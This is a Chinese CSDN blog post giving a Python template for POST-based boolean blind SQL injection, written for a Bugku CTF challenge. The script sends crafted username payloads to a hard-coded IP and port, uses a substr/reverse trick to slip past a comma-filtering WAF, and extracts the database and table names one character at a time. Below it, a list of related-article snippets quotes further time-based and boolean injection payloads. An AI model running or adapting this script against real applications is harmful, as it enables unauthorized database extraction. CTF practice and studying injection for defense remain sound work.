基于post方法的sql布尔型盲注模板

最新推荐文章于 2024-03-21 14:56:30 发布
最新推荐文章于 2024-03-21 14:56:30 发布
阅读量257 收藏 1
点赞数
分类专栏: ctf sql注入 文章标签: sql 数据库 database python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37301470/article/details/121165925
版权 
#记录下bugku中的一道布尔盲注题目“sql注入”
import requests as req
#Post 类型的bool盲注
#过滤了','没法用mid,substr,left 截取 试试substr(()from()for())

url="http://114.67.246.176:17306/"
#bugku项目的url地址
s=req.session()
#创建session对象
select="database()"
select2="select group_concat(table_name) from information_schema.tables where table_schema=database()"
#查询语句
res=''
#结果保存在res
#i是枚举字符的位数,从第一位开始枚举
#ascii从a开始枚举到z
for i in range(1,100):
    for ascii in range(32,128):
        data = {
            'username':f"a'or(ord(substr(reverse(substr(({select})from({i})))from(9-{i})))<>{ascii})#",
            'password': 'asd'
        }
        #对post的数据username进行sql盲注
        #这里由于有waf过滤掉了',','for'等字符使众多方法失效
        #构造payload:or(ord(substr(reverse(substr(({select})from({i})))from(9-{i})))<>{ascii})#
        #里面的9是事先测出的database()的长度
        r=s.post(url=url,data=data)
        if "username does not exist!" in r.text:
            res+=chr(ascii)
            print(res)
            break
        if ascii ==127:
            exit(0)
捞氘河水怪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL | POST基于时间与布尔盲注
m_de_g的博客
12-06 1471
SQL | POST基于时间与布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间的盲注 3.POST基于布尔盲注 4.sqlmap安全测试 ...
时间盲注布尔盲注脚本
星星的博客
07-01 397
sql盲注
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4924
SQL注入原理-POST注入
SQL注入:POST盲注&万能密码/SQL报错注入
zh的博客
10-11 609
靶场地址:http://www.whalwl.host:8003/user/login.php http://www.whalwl.host:8004/user/edit.php 解题准备:本题需要使用burpsuite 解题思路: 1、根据提示,个人中心,更新用户名这里存在POST注入 BP抓包,对POST中username进行语法尝试,添加 ' 出现SQL报错 采用报错注入,不需要进行盲注 添加',根据报错判断,多了一个'闭合符为 ' '...
两种CTF中特殊盲注的总结
蚁景网安学院
02-04 932
知识点实操概要MySQL注入中,3种盲注方式:基于布尔盲注、基于时间的盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
第九节 POST基于时间和布尔盲注-01
09-15
POST 基于布尔盲注中,我们可以通过在参数后加上特殊的语句来检测是否存在注入点。例如,可以使用 `if` 语句来判断正确或错误的语句。例如,可以使用 `select length(database())`、`select substr(database(),...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
SQL字符字段按数字字段排序实现方法
01-21
 Ludou Simple Vote的投票得分结果是以自定义栏目的方式存储在WordPress的postmeta中,分值存放在meta_value字段,而meta_value字段类是longtext,如果直接使用下面的SQL查询语句来排序: 代码如下: ORDER BY `...
Python基于PycURL实现POST方法
12-25
本文实例讲述了Python基于PycURL实现POST方法。分享给大家供大家参考。具体如下: import pycurl import StringIO import urllib url = "http://www.google.com/" post_data_dic = {"name":"value"} crl = pycurl...
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
SQL注入POST注入
weixin_43765321的博客
03-03 3713
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
Bool盲注脚本
Forever_Han13的博客
01-21 646
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
Web安全攻防的学习——06—(盲注介绍、GET基于时间的盲注、GET基于Boolean的盲注POST基于错误的注入、POST基于时间的盲注SQL注入绕过手段)(重点)
weixin_42118531的博客
03-02 540
1、盲注介绍 Blind SQL(盲注)是注入攻击的其中一种,向数据库发生true或false这样的问题,并根据应用程 序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题 盲注种类 1.布尔 2.时间的盲注 GET基于时间的盲注 if(ascii(substr(database(),1,1))=115,1,sleep(3)) # ...
POST基于时间和布尔盲注
qq_60876907的博客
07-19 261
命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit。存在注入点POST提交的参数 + and if (length(datebase())>5,sleep(5),null).如果执行的时间页面响应时间大于5 秒,肯定存在注入点,并且对应的SQL 语句执行。1,在存在注入点POST提交的参数后加入 if 判断正确或者错误的语句。2,POST基于时间盲注
记一次POST数据中JSON参数存在SQL延时盲注
最新发布
weixin_42675091的博客
03-21 427
4.还一个重要的点,,没加端口使用sqlmap跑的时候,开始跑之前就会出302,让我选y,可能是没加端口的时候是80端口,所以302到443,,但这时候跑不出来,且看sqlmap的响应包中每个请求都有302响应,给人感觉一直请求的目标就不对。6.最开始的时候,还出现了payload加在””后面,如”name”:”” ‘ and select,最后跑不出来,后来直接将name的值的””删除,发现payload正常了。7.后面又发现可以直接将type参数删除,只保留name也能行,可避免注到type中去。
get和post请求的sql盲注防护
木一番的博客
03-18 716
get和post请求的sql盲注防护 网上很多方案都只拦截了get请求,但是涉及到post请求的资料却很少。踩了一些坑,这里给大家分享一波,希望大家少踩坑吧,哪里有不妥的地方,欢迎各位斧正 只拦截get请求,post请求类Content-Type为application/json的,否则,会被拦截,例如上传个图片是不行的,图片转码后,有太多的特殊敏感字符,会被sql拦截器拦住,导致上传失败。 SqlInjectFilter 由于实现filter只能处理一次post请求流,所以用到了包装类sqlIn
SQL 盲注GET /POST布尔,延时Python脚本
小锤队长的博客
08-09 4294
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
(学习)SQL注入-POST注入
热门推荐
Huang921的博客
11-21 1万+
SQL注入-POST注入实践
sql注入_1-4_post盲注
weixin_44110913的博客
12-04 1411
sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等,请求数据会包含在请求体中 3.使用post方法时,查询字符在post信息中单独存在,和http请求一起发送到服务器 二.实验 这里我们使用sqli less-15实验基于post时间和布尔 先...
post基于布尔盲注
05-05
基于布尔盲注是一种常见的SQL注入攻击技术,可以通过构造特定的SQL查询语句来获取数据库中的敏感信息。在这种攻击中,攻击者通过向受攻击的应用程序中输入恶意的SQL代码来触发漏洞。 在基于布尔盲注中,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值